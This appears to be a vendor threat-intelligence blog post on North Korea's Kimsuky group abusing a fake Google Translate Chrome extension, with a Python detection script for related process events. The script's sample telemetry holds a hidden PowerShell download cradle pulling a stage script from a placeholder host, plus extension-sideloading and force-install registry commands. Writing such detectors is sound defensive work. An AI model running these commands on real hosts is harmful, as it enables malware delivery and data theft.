Kimsuky APT Attack Detection: North Korean Hackers Abuse the TRANSLATEXT Chrome Extension to Steal Sensitive Data

July 03, 2024 · 3 min read

The North Korea-linked threat actor known as Kimsuky is using a novel malicious Google Chrome extension dubbed “TRANSLATEXT” for cyber espionage, illicitly collecting sensitive user data. The ongoing campaign, observed since early spring 2024, primarily targets South Korean academic institutions.

Detect Kimsuky Campaign Leveraging TRANSLATEXT

With APT activity on the rise amid intensifying geopolitical tensions, security professionals should stay on top of potential attacks using next-gen tools for advanced threat detection and hunting.

Rely on the SOC Prime Platform for collective cyber defense to proactively identify suspicious activity linked to APTs, including the latest cyber espionage campaign in which Kimsuky leverages the malicious TRANSLATEXT extension to obtain access to sensitive data. Below, you can find a dedicated Sigma rule by our keen Threat Bounty developer Sittikorn Sangrattanapitak, which detects command lines associated with the installation of the malicious Chrome extension.

Possible Kimsuky TRANSLATEXT Targeting South Korean by Detection of Associated Commands (via cmdline)

The rule is compatible with 27 SIEM, EDR, and Data Lake solutions and mapped to MITRE ATT&CK® framework. Additionally, the detection is enriched with relevant metadata and CTI references to streamline threat investigation. 

Security professionals seeking more detection content linked to Kimsuky APT can access the broader Sigma rules stack aggregated in the Threat Detection Marketplace. Just hit the Explore Detection buttons below and immediately drill down to the rule collection, with new detections being added daily.

Explore Detections

Whether you’re a seasoned Threat Hunter, DFIR expert, Sigma rules specialist, or SOC Analyst eager to contribute to the collective good, you can join SOC Prime’s world’s first detection engineering crowdsourcing initiative. Become a Threat Bounty Program member to unleash your personal talent, improve detection engineering & threat hunting skills, expand technology expertise, and obtain financial benefits for your contribution.

Attack Analysis Linked to Kimsuky Using TRANSLATEXT Chrome Extension

Since early spring 2024, Zscaler ThreatLabz has been monitoring ongoing offensive activity linked to the Kimsuky APT group targeting the South Korean academic sector, specifically researchers focused on political topics related to North Korea. Kimsuky, a North Korea-based hacking group also tracked as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet, and TA406, has been notorious for over a decade for cyber espionage and financially motivated attacks against South Korean entities. In the latest campaign, the adversaries weaponize a malicious Google Chrome extension called TRANSLATEXT, disguised as Google Translate, to collect email addresses, credentials, and cookies, and to capture browser screenshots.

In early March 2024, Kimsuky uploaded TRANSLATEXT to a GitHub repository under their control. The extension bypasses security measures of major email providers to extract sensitive information.

The attack flow starts with a ZIP archive purporting to contain Korean military history data. The archive holds two files: a document in Hangul Word Processor (HWP) format and an executable. Running the executable downloads a PowerShell script from an adversary-controlled server. That script then sends information about the compromised host to a GitHub repository and retrieves further PowerShell code via a Windows shortcut (LNK) file.
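To make the command-line angle of this chain concrete, here is an added example (not SOC Prime's Sigma rule and not code from the Zscaler analysis) that runs three process-creation heuristics over constructed Sysmon-style events: a PowerShell download cradle spawned by a binary running from a user-writable path, Chrome launched with an unpacked extension via `--load-extension`, and a write to the `ExtensionInstallForcelist` policy key. The page does not state how Kimsuky installed TRANSLATEXT on victim hosts; the two Chrome checks are assumptions about common extension-sideloading methods, and every path, file name and URL below is made up.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / EDR style)."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry for a hypothetical host; file names, paths and
# the URL are invented and are NOT indicators from the Kimsuky campaign.
SAMPLE_EVENTS = [
    # 0: user opens the executable extracted from the lure archive
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Users\alice\Downloads\lure\history.exe",
                 r'"C:\Users\alice\Downloads\lure\history.exe"'),
    # 1: that executable spawns a PowerShell download cradle
    ProcessEvent(r"C:\Users\alice\Downloads\lure\history.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/stage1.ps1')\""),
    # 2: PowerShell starts Chrome with an unpacked extension from a user-writable path
    #    (assumed sideloading method; the page does not say how TRANSLATEXT was installed)
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                 r'--load-extension="C:\Users\alice\AppData\Local\ext\translate"'),
    # 3: ordinary Chrome launch, must not fire
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'),
    # 4: admin script without any download cradle, must not fire
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    # 5: extension force-install policy written to the registry (assumed method)
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\reg.exe",
                 r'reg.exe add "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist" '
                 r'/v 1 /t REG_SZ /d "abcdefghijklmnopabcdefghijklmnop;http://example.invalid/update.xml" /f'),
]

DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Net\.WebClient",
    re.IGNORECASE)
SIDELOADED_EXTENSION = re.compile(r"--load-extension=", re.IGNORECASE)
FORCELIST_POLICY = re.compile(r"ExtensionInstallForcelist", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: ProcessEvent) -> list[str]:
    """Return the names of the heuristics that match a single event."""
    hits = []
    image = _basename(event.image)

    # Heuristic 1: PowerShell download cradle whose parent runs from a user-writable path
    if (image in ("powershell.exe", "pwsh.exe")
            and DOWNLOAD_CRADLE.search(event.command_line)
            and USER_WRITABLE.search(event.parent_image)):
        hits.append("ps_download_cradle_from_user_path")

    # Heuristic 2: Chrome started with an unpacked (sideloaded) extension
    if image == "chrome.exe" and SIDELOADED_EXTENSION.search(event.command_line):
        hits.append("chrome_sideloaded_extension")

    # Heuristic 3: extension force-install policy set from a command line
    if image in ("reg.exe", "powershell.exe", "pwsh.exe") and FORCELIST_POLICY.search(event.command_line):
        hits.append("chrome_extension_forcelist_policy")

    return hits


def scan(events: list[ProcessEvent]) -> list[tuple[int, str]]:
    """Run every heuristic over a list of events; returns (event index, rule name) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} :: {SAMPLE_EVENTS[idx].command_line}")
```

Heuristic 3 will also fire when legitimate endpoint-management tooling writes the force-list key, so in production it should be scoped by parent process or by an allow-list of your own management agents; heuristics 1 and 2 are useful pivots for the cmdline-based rule above rather than standalone alerts.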

Defenders are advised to avoid installing programs from untrusted sources to mitigate the risks of the latest Kimsuky campaign. This is imperative for remaining cyber vigilant and preventing potential data breaches. Stay ahead of emerging threats and future-proof your organization’s cybersecurity posture by leveraging SOC Prime’s complete product suite for AI-powered Detection Engineering, Automated Threat Hunting, and Detection Stack Validation.
